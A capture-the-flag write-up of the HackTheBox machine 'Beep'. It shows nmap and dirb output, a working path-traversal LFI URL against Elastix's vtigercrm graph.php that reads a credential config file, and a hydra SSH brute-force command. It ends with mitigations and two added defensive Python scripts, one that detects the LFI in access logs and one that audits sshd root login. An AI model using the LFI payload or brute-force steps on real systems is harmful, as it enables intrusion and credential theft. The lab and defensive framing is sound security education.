
HackTheBox 'Beep' writeup


 

A Quick HackTheBox (HTB) walkthrough of ‘beep’

 


Host Information

Hostname: Beep
Operating System: Linux
HTB Difficulty Rating: Easy

 


 

enumeration

 

initial nmap

─➤  sudo nmap -sS -sV -p- -O -oA beep 10.10.10.7
[sudo] password for initinfosec: 
Starting Nmap 7.80SVN ( https://nmap.org ) at 2019-12-27 14:22 CST
Nmap scan report for 10.10.10.7
Host is up (0.045s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80SVN%E=4%D=12/27%OT=22%CT=1%CU=32404%PV=Y%DS=2%DC=I%G=Y%TM=5E0
OS:66903%P=x86_64-unknown-linux-gnu)SEQ(SP=CA%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=
OS:M54DST11NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11
OS:NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.31 seconds

So it looks like there's a lot open. MySQL and SSH may be of special interest, but let's go ahead and enumerate the HTTP server contents with dirb.

initial dirb

╭─initinfosec@theMachine ~/writeups/HTB/beep/enumeration  
╰─➤  cat beep_port80_results.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: beep_port80_results.txt
START_TIME: Fri Dec 27 15:03:14 2019
URL_BASE: http://10.10.10.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.7/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')

-----------------
END_TIME: Fri Dec 27 15:03:15 2019
DOWNLOADED: 0 - FOUND: 0

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: beep_port80_results.txt
START_TIME: Fri Dec 27 15:08:07 2019
URL_BASE: https://10.10.10.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://10.10.10.7/ ----
==> DIRECTORY: https://10.10.10.7/admin/
+ https://10.10.10.7/cgi-bin/ (CODE:403|SIZE:286)
==> DIRECTORY: https://10.10.10.7/configs/
+ https://10.10.10.7/favicon.ico (CODE:200|SIZE:894)
==> DIRECTORY: https://10.10.10.7/help/
==> DIRECTORY: https://10.10.10.7/images/
+ https://10.10.10.7/index.php (CODE:200|SIZE:1785)
==> DIRECTORY: https://10.10.10.7/lang/
==> DIRECTORY: https://10.10.10.7/libs/
==> DIRECTORY: https://10.10.10.7/mail/
==> DIRECTORY: https://10.10.10.7/modules/
==> DIRECTORY: https://10.10.10.7/panel/
+ https://10.10.10.7/robots.txt (CODE:200|SIZE:28)
==> DIRECTORY: https://10.10.10.7/static/
==> DIRECTORY: https://10.10.10.7/themes/
==> DIRECTORY: https://10.10.10.7/var/

---- Entering directory: https://10.10.10.7/admin/ ----
==> DIRECTORY: https://10.10.10.7/admin/common/
+ https://10.10.10.7/admin/favicon.ico (CODE:200|SIZE:318)
==> DIRECTORY: https://10.10.10.7/admin/images/
+ https://10.10.10.7/admin/index.php (CODE:302|SIZE:0)
+ https://10.10.10.7/admin/modules (CODE:403|SIZE:291)
+ https://10.10.10.7/admin/views (CODE:403|SIZE:289)

---- Entering directory: https://10.10.10.7/configs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/help/ ----
==> DIRECTORY: https://10.10.10.7/help/content/
+ https://10.10.10.7/help/index.php (CODE:200|SIZE:346)

---- Entering directory: https://10.10.10.7/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/libs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/ ----
==> DIRECTORY: https://10.10.10.7/mail/bin/
+ https://10.10.10.7/mail/config (CODE:403|SIZE:289)
+ https://10.10.10.7/mail/index.php (CODE:200|SIZE:2649)
==> DIRECTORY: https://10.10.10.7/mail/installer/
+ https://10.10.10.7/mail/LICENSE (CODE:200|SIZE:17987)
+ https://10.10.10.7/mail/logs (CODE:403|SIZE:287)
==> DIRECTORY: https://10.10.10.7/mail/plugins/
==> DIRECTORY: https://10.10.10.7/mail/program/
+ https://10.10.10.7/mail/README (CODE:200|SIZE:1856)
+ https://10.10.10.7/mail/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: https://10.10.10.7/mail/skins/
==> DIRECTORY: https://10.10.10.7/mail/SQL/
+ https://10.10.10.7/mail/temp (CODE:403|SIZE:287)

---- Entering directory: https://10.10.10.7/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/panel/ ----
+ https://10.10.10.7/panel/FAQ (CODE:200|SIZE:2449)
==> DIRECTORY: https://10.10.10.7/panel/flash/
+ https://10.10.10.7/panel/index.php (CODE:200|SIZE:1065)
==> DIRECTORY: https://10.10.10.7/panel/init/
+ https://10.10.10.7/panel/README (CODE:200|SIZE:7421)
+ https://10.10.10.7/panel/TODO (CODE:200|SIZE:241)

---- Entering directory: https://10.10.10.7/static/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/var/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/admin/common/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/help/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/bin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/installer/ ----
==> DIRECTORY: https://10.10.10.7/mail/installer/images/
+ https://10.10.10.7/mail/installer/index.php (CODE:302|SIZE:0)

---- Entering directory: https://10.10.10.7/mail/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/program/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/SQL/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/panel/flash/ ----
+ https://10.10.10.7/panel/flash/crossdomain.xml (CODE:200|SIZE:221)
+ https://10.10.10.7/panel/flash/index.html (CODE:200|SIZE:1089)

---- Entering directory: https://10.10.10.7/panel/init/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: https://10.10.10.7/mail/installer/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Dec 27 16:30:12 2019
DOWNLOADED: 32284 - FOUND: 23

Alright, so going to the URI shows an admin panel for Elastix (a PBX dashboard, from the looks of it). Trying to go to an admin page yields a login prompt. After trying a few Elastix default creds I searched for, I decided to try to crack the password to the admin panel before pursuing other routes.

After giving Burp and hydra a shot, I tentatively concluded that the login page may be doing some kind of page refresh or HTTP redirect on an incorrect login, rather than returning an invalid login message or some error text. I stepped through the page with Burp forwarding several times, and failed to find any key text to pass to hydra so it would know the attempt was invalid and move on to the next credential.

I probably could have confirmed (or invalidated) the page refresh/HTTP redirect theory somehow, but decided for the time being to not spend too much time on this route.

 

further enumeration for exploitation

 

I then searched searchsploit for Elastix.

One of the results was an LFI, which exposed a config file with creds in it.

The URI For the LFI was:

#LFI Exploit: 10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

It was not very clean in the browser, so I wget'd it to a file and grep'd for a password for the admin user:

cat LFI_results| grep -i pass

which gave me the login for the page.
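As an added detection example (not from the original post): a small Python scanner that flags the traversal and null-byte pattern of this LFI request in Apache access-log lines, decoding twice so that double-encoded variants are caught too. The log lines are constructed samples shaped like the request above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache access-log lines for illustration (not captured from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [27/Dec/2019:16:41:02 -0600] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
10.10.14.5 - - [27/Dec/2019:16:41:10 -0600] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action=index HTTP/1.1" 200 1785 "-" "Mozilla/5.0"
10.10.14.5 - - [27/Dec/2019:16:42:00 -0600] "GET /mail/index.php?_task=mail HTTP/1.1" 200 2649 "-" "Mozilla/5.0"
10.10.14.5 - - [27/Dec/2019:16:43:00 -0600] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 512 "-" "curl/7.68"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(param, decoded_value, reasons)] for query params that look like LFI."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; decode again for %25-encoding
        reasons = []
        if "../" in value or "..\\" in value:
            reasons.append("directory traversal")
        if "\x00" in value:
            reasons.append("null byte (truncates the include path on old PHP)")
        if re.search(r"/etc/|\.conf(\x00|$)", value):
            reasons.append("system/config file path")
        if reasons:
            findings.append((name, value, reasons))
    return findings


def scan_log(text):
    """Scan access-log text; return one alert dict per request with suspicious params."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = suspicious_params(m.group("target"))
        if findings:
            alerts.append({"client": line.split(" ", 1)[0],
                           "path": urlsplit(m.group("target")).path,
                           "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for name, value, reasons in alert["findings"]:
            print(f'{alert["client"]} {alert["path"]} {name}={value!r}: {", ".join(reasons)}')
```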

I split the file into wordlists of usernames and passwords to try and log in to the SSH service.

sudo hydra -V -L list -P list 10.10.10.7 ssh

 

For some reason, that did not find the password (I think my hydra install on Arch was borked at the time of this box), but picking a password entry manually (the same one as for the Elastix login page) allowed me to log in to SSH as root. From there, I grabbed the user and root flags.

Pretty easy and simple. Looks like we didn’t have to go down other avenues such as MySQL.

 

Advised Mitigations

Were this a client assessment, I would probably advise the following to mitigate the risk of system compromise (based on my cursory findings on the box):

  • Patch Elastix to mitigate the LFI (and other) vulnerabilities.
  • Change the SSH password for root to be distinctly different from the Elastix admin page password. Better yet, disallow root login over SSH (if possible/not needed).
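An added example (not part of the original post) for the second mitigation: a Python check of which PermitRootLogin value sshd would actually use, honouring sshd's first-occurrence-wins rule and the pre-7.0 default of yes that applies to the OpenSSH 4.3 seen in the scan. The config fragments are constructed.

```python
# Constructed sshd_config fragments for illustration (not copied from the box).
WEAK_CONFIG = """\
Protocol 2
# PermitRootLogin is commented out, so the compiled-in default applies
#PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""


def effective_setting(config_text, keyword, default):
    """Effective global value of an sshd_config keyword.

    sshd honours the FIRST uncommented occurrence of a keyword (later duplicates
    are ignored), and keywords inside a Match block only apply conditionally,
    so they are skipped here. A missing keyword falls back to `default`.
    """
    in_match = False
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ").split(None, 1)  # 'Key value' or 'Key=value'
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            in_match = True
        elif not in_match and key == keyword.lower():
            return value
    return default


def audit_root_login(config_text, default_permit_root="yes"):
    """Report whether root can still log in over SSH.

    OpenSSH before 7.0 (the box runs 4.3) defaults PermitRootLogin to 'yes';
    pass default_permit_root='prohibit-password' when auditing newer servers.
    """
    root = effective_setting(config_text, "PermitRootLogin", default_permit_root).lower()
    passwd = effective_setting(config_text, "PasswordAuthentication", "yes").lower()
    issues = []
    if root == "yes" and passwd == "yes":
        issues.append("root can log in over SSH with a password")
    elif root != "no":
        issues.append(f"root login still permitted (PermitRootLogin={root})")
    return issues


if __name__ == "__main__":
    print("weak:", audit_root_login(WEAK_CONFIG))
    print("hardened:", audit_root_login(HARDENED_CONFIG))
```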

 

Conclusion/Learning takeaways

Nothing in the box really surprised me overall, as it was pretty simple. It does reinforce the fact, however, that I need to get more familiar with Burp Suite.

 

That’s all for now, thanks for reading, hope it was useful.

 

~@initinfosec
